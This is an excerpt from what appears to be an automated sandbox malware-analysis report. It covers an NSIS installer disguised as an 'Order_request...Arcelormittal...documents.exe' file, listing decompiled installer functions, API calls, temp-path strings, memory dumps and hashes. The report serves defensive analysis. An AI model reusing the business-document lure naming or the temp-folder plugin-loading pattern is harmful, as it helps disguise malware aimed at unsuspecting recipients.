WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nspD224.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nspD224.tmp\System.dll,00000400,?,?,00000021), ref: 00402583
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nspD224.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nspD224.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nspD224.tmp\System.dll,00000400,?,?,00000021), ref: 0040258E

Strings

C:\Users\user\AppData\Local\Temp\nspD224.tmp, xrefs: 0040257C
C:\Users\user\AppData\Local\Temp\nspD224.tmp\System.dll, xrefs: 00402552, 00402575, 00402589, 004025D5

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nspD224.tmp$C:\Users\user\AppData\Local\Temp\nspD224.tmp\System.dll
API String ID: 3109718747-2222174924
Opcode ID: 0cfac67b0bc91c88d3b6eabad01ed5c174bf69e0857470ad85ca214ab4ad8ec8
Instruction ID: a78273f1e820df777bc5fa4653ad4ee3f77bb41165bb33dae94d39b2abea877a
Opcode Fuzzy Hash: 0cfac67b0bc91c88d3b6eabad01ed5c174bf69e0857470ad85ca214ab4ad8ec8
Instruction Fuzzy Hash: FC110A72A41304BEDB10AFB18F4AE9E3665AF54355F60803BF501F61C1DAFC8E51466E

Uniqueness

Uniqueness Score: -1.00%

Function 00405AEE Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 47
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00405AEE(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E00406032(0x7a4748, _a4);
				_t21 = E00405A91(0x7a4748);
				if(_t21 != 0) {
					E004062C6(_t21);
					if(( *0x7a8a58 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x7a4748 >> 1;
						while(1) {
							_t11 = lstrlenW(0x7a4748);
							_push(0x7a4748);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E00406375();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405A32(0x7a4748);
								continue;
							} else {
								goto L1;
							}
						}
						E004059E6();
						return 0 | GetFileAttributesW(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

0x00405afa
0x00405b05
0x00405b09
0x00405b10
0x00405b1c
0x00405b2c
0x00405b2e
0x00405b46
0x00405b47
0x00405b4e
0x00405b4f
0x00000000
0x00000000
0x00405b32
0x00405b39
0x00405b41
0x00000000
0x00000000
0x00000000
0x00000000
0x00405b39
0x00405b51
0x00000000
0x00405b65
0x00405b1e
0x00405b24
0x00000000
0x00000000
0x00000000
0x00000000
0x00405b24
0x00405b0b
0x00000000

APIs

Part of subcall function 00406032: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,0040332D,Overcaustically Setup,NSIS Error), ref: 0040603F

Part of subcall function 00405A91: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nspD224.tmp,0040A300,00405B05,C:\Users\user\AppData\Local\Temp\nspD224.tmp,C:\Users\user\AppData\Local\Temp\nspD224.tmp, 4.v,?,C:\Users\user\AppData\Local\Temp\,00405843,?,762E3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe"), ref: 00405A9F
Part of subcall function 00405A91: CharNextW.USER32(00000000), ref: 00405AA4
Part of subcall function 00405A91: CharNextW.USER32(00000000), ref: 00405ABC

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nspD224.tmp,00000000,C:\Users\user\AppData\Local\Temp\nspD224.tmp,C:\Users\user\AppData\Local\Temp\nspD224.tmp, 4.v,?,C:\Users\user\AppData\Local\Temp\,00405843,?,762E3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe"), ref: 00405B47
GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nspD224.tmp,C:\Users\user\AppData\Local\Temp\nspD224.tmp,C:\Users\user\AppData\Local\Temp\nspD224.tmp,C:\Users\user\AppData\Local\Temp\nspD224.tmp,C:\Users\user\AppData\Local\Temp\nspD224.tmp,C:\Users\user\AppData\Local\Temp\nspD224.tmp,00000000,C:\Users\user\AppData\Local\Temp\nspD224.tmp,C:\Users\user\AppData\Local\Temp\nspD224.tmp, 4.v,?,C:\Users\user\AppData\Local\Temp\,00405843,?,762E3420,C:\Users\user\AppData\Local\Temp\), ref: 00405B57

Strings

4.v, xrefs: 00405AF0
C:\Users\user\AppData\Local\Temp\nspD224.tmp, xrefs: 00405AF4, 00405AF9, 00405AFF, 00405B40, 00405B46, 00405B4E, 00405B56
C:\Users\user\AppData\Local\Temp\, xrefs: 00405AEE

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: 4.v$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nspD224.tmp
API String ID: 3248276644-1882814062
Opcode ID: 1c109e48d901a23ea14b6098b96b6ff6b364b8c8cfe64631121789c2790142ee
Instruction ID: 3bddcdf43bb23baaa909825d7db9bcd58a82d3117edc1a0c43d32c447e9df16d
Opcode Fuzzy Hash: 1c109e48d901a23ea14b6098b96b6ff6b364b8c8cfe64631121789c2790142ee
Instruction Fuzzy Hash: F4F0F429104D6216C232723A1C49AAF3564CF92364B1A063FBC51B12C1DF3CBD42CCAE

Uniqueness

Uniqueness Score: -1.00%

Function 100015FF Relevance: 7.5, APIs: 5, Instructions: 41
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100015FF(struct HINSTANCE__* _a4, short* _a8) {
				_Unknown_base(*)()* _t7;
				void* _t10;
				int _t14;

				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
				_t10 = GlobalAlloc(0x40, _t14);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
				_t7 = GetProcAddress(_a4, _t10);
				GlobalFree(_t10);
				return _t7;
			}

0x10001619
0x10001625
0x10001632
0x10001639
0x10001642
0x1000164e

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
GlobalFree.KERNEL32(00000000), ref: 10001642

Memory Dump Source

Source File: 00000001.00000002.63200218360.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.63200192081.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.63200243775.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.63200269821.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1

Uniqueness

Uniqueness Score: -1.00%

Function 00401CFA Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401CFA() {
				void* _t18;
				struct HINSTANCE__* _t22;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 0xc),  *(_t27 - 0x28));
				GetClientRect(_t25, _t27 - 0x54);
				_t18 = SendMessageW(_t25, 0x172, _t22, LoadImageW(_t22, E00402BBF(_t22), _t22,  *(_t27 - 0x4c) *  *(_t27 - 0x24),  *(_t27 - 0x48) *  *(_t27 - 0x24), 0x10));
				if(_t18 != _t22) {
					DeleteObject(_t18);
				}
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}

0x00401d06
0x00401d0d
0x00401d3c
0x00401d44
0x00401d4b
0x00401d4b
0x00402a4f
0x00402a5b

APIs

GetDlgItem.USER32(?,?), ref: 00401D00
GetClientRect.USER32(00000000,?), ref: 00401D0D
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
DeleteObject.GDI32(00000000), ref: 00401D4B

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 744784328c674175fcbcfcf0e9bbf26443557e854759898e5afcc3989039e9af
Instruction ID: b0c4edec147008cd01dbb3001b95c609c297ceb5d42f7dfd9ff58b90d4b754cd
Opcode Fuzzy Hash: 744784328c674175fcbcfcf0e9bbf26443557e854759898e5afcc3989039e9af
Instruction Fuzzy Hash: D2F0F472500504AFDB01DBE4DE88CEEBBBDEB48311B104476F501F51A1CA74DD018B38

Uniqueness

Uniqueness Score: -1.00%

Function 0040494D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E0040494D(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E00406054(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E00406054(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E00406054(_t44, _t50, 0x7a1f40, 0x7a1f40, _a8);
				wsprintfW(_t34 + lstrlenW(0x7a1f40) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x7a7a18, _a4, 0x7a1f40);
			}

0x00404956
0x0040495b
0x00404963
0x00404964
0x00404971
0x00404979
0x0040497a
0x0040497c
0x0040497e
0x00404980
0x00404983
0x00404983
0x0040498a
0x00404990
0x00404990
0x00404997
0x0040499e
0x004049a1
0x004049a4
0x004049a4
0x004049a8
0x004049b8
0x004049ba
0x004049bd
0x00404966
0x00404966
0x0040496d
0x0040496d
0x004049c5
0x004049d0
0x004049e6
0x004049f7
0x00404a13

APIs

lstrlenW.KERNEL32(007A1F40,007A1F40,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,-007A9000), ref: 004049EE
wsprintfW.USER32 ref: 004049F7
SetDlgItemTextW.USER32(?,007A1F40), ref: 00404A0A

Strings

%u.%u%s%s, xrefs: 004049D8

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: ce9979b4b01424170f7f3781fe10c2b71c9da1ea9fb3152acdeb899b4a45e53b
Instruction ID: b64f68613590d753eae0667b1f9c1485f74a5586c4fdc6504f9435c9407cab2f
Opcode Fuzzy Hash: ce9979b4b01424170f7f3781fe10c2b71c9da1ea9fb3152acdeb899b4a45e53b
Instruction Fuzzy Hash: EC11D87360412827EB10A66D9C41EDF329C9B82334F150237FA65F21D1EA78C82682E8

Uniqueness

Uniqueness Score: -1.00%

Function 00405A91 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405A91(WCHAR* _a4) {
				WCHAR* _t5;
				short* _t7;
				WCHAR* _t10;
				short _t11;
				WCHAR* _t12;
				void* _t14;

				_t12 = _a4;
				_t10 = CharNextW(_t12);
				_t5 = CharNextW(_t10);
				_t11 =  *_t12;
				if(_t11 == 0 ||  *_t10 != 0x3a || _t10[1] != 0x5c) {
					if(_t11 != 0x5c || _t12[1] != _t11) {
						L10:
						return 0;
					} else {
						_t14 = 2;
						while(1) {
							_t14 = _t14 - 1;
							_t7 = E00405A13(_t5, 0x5c);
							if( *_t7 == 0) {
								goto L10;
							}
							_t5 = _t7 + 2;
							if(_t14 != 0) {
								continue;
							}
							return _t5;
						}
						goto L10;
					}
				} else {
					return CharNextW(_t5);
				}
			}

0x00405a9a
0x00405aa1
0x00405aa4
0x00405aa6
0x00405aac
0x00405ac4
0x00405ae6
0x00000000
0x00405acc
0x00405ace
0x00405acf
0x00405ad2
0x00405ad3
0x00405adc
0x00000000
0x00000000
0x00405adf
0x00405ae2
0x00000000
0x00000000
0x00000000
0x00405ae2
0x00000000
0x00405acf
0x00405abb
0x00000000
0x00405abc

APIs

CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nspD224.tmp,0040A300,00405B05,C:\Users\user\AppData\Local\Temp\nspD224.tmp,C:\Users\user\AppData\Local\Temp\nspD224.tmp, 4.v,?,C:\Users\user\AppData\Local\Temp\,00405843,?,762E3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe"), ref: 00405A9F
CharNextW.USER32(00000000), ref: 00405AA4
CharNextW.USER32(00000000), ref: 00405ABC

Strings

C:\Users\user\AppData\Local\Temp\nspD224.tmp, xrefs: 00405A92

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: CharNext
String ID: C:\Users\user\AppData\Local\Temp\nspD224.tmp
API String ID: 3213498283-89864070
Opcode ID: 1b3bb70d064d2828b3f020bf6a5482fb991db3eaf72ecbcdc1d8bf2f545e9475
Instruction ID: 0cb906ce55498ce86d0db88686860b14f8f146b66f9f6c0e4bde91ccc4fe9cfd
Opcode Fuzzy Hash: 1b3bb70d064d2828b3f020bf6a5482fb991db3eaf72ecbcdc1d8bf2f545e9475
Instruction Fuzzy Hash: E2F09611B10F1195DF3176545CC5A7B6AB8EB94354B04863BD602B72C0D7B84D818F99

Uniqueness

Uniqueness Score: -1.00%

Function 004059E6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E004059E6(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}

0x004059e7
0x004059f4
0x004059f5
0x00405a00
0x00405a08
0x00405a08
0x00405a10

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040326A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034A9), ref: 004059EC
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040326A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034A9), ref: 004059F6
lstrcatW.KERNEL32(?,0040A014), ref: 00405A08

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004059E6

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3355392842
Opcode ID: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
Instruction ID: ee04230c76b470484a65779322a078522fef8bc0a4cae86812832761b4080375
Opcode Fuzzy Hash: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
Instruction Fuzzy Hash: 30D0A7711019306AC121EB449C04DDF629CAF45300341443FF501B30A2C77C5D618BFE

Uniqueness

Uniqueness Score: -1.00%

Function 00402D8A Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402D8A(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x7976f8; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x7a8a4c;
						if(_t2 >  *0x7a8a4c) {
							_t3 = CreateDialogParamW( *0x7a8a40, 0x6f, 0, E00402D04, 0);
							 *0x7976f8 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00406444(0);
					}
				} else {
					_t6 =  *0x7976f8; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x7976f8 = 0;
					return _t6;
				}
			}

0x00402d91
0x00402dab
0x00402db1
0x00402dbb
0x00402dc1
0x00402dc7
0x00402dd8
0x00402de1
0x00000000
0x00402de6
0x00402ded
0x00402db3
0x00402dba
0x00402dba
0x00402d93
0x00402d93
0x00402d9a
0x00402d9d
0x00402d9d
0x00402da3
0x00402daa
0x00402daa

APIs

DestroyWindow.USER32(00000000,00000000,00402F6A,00000001,?,?,00000000,00403517,?), ref: 00402D9D
GetTickCount.KERNEL32 ref: 00402DBB
CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
ShowWindow.USER32(00000000,00000005,?,?,00000000,00403517,?), ref: 00402DE6

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
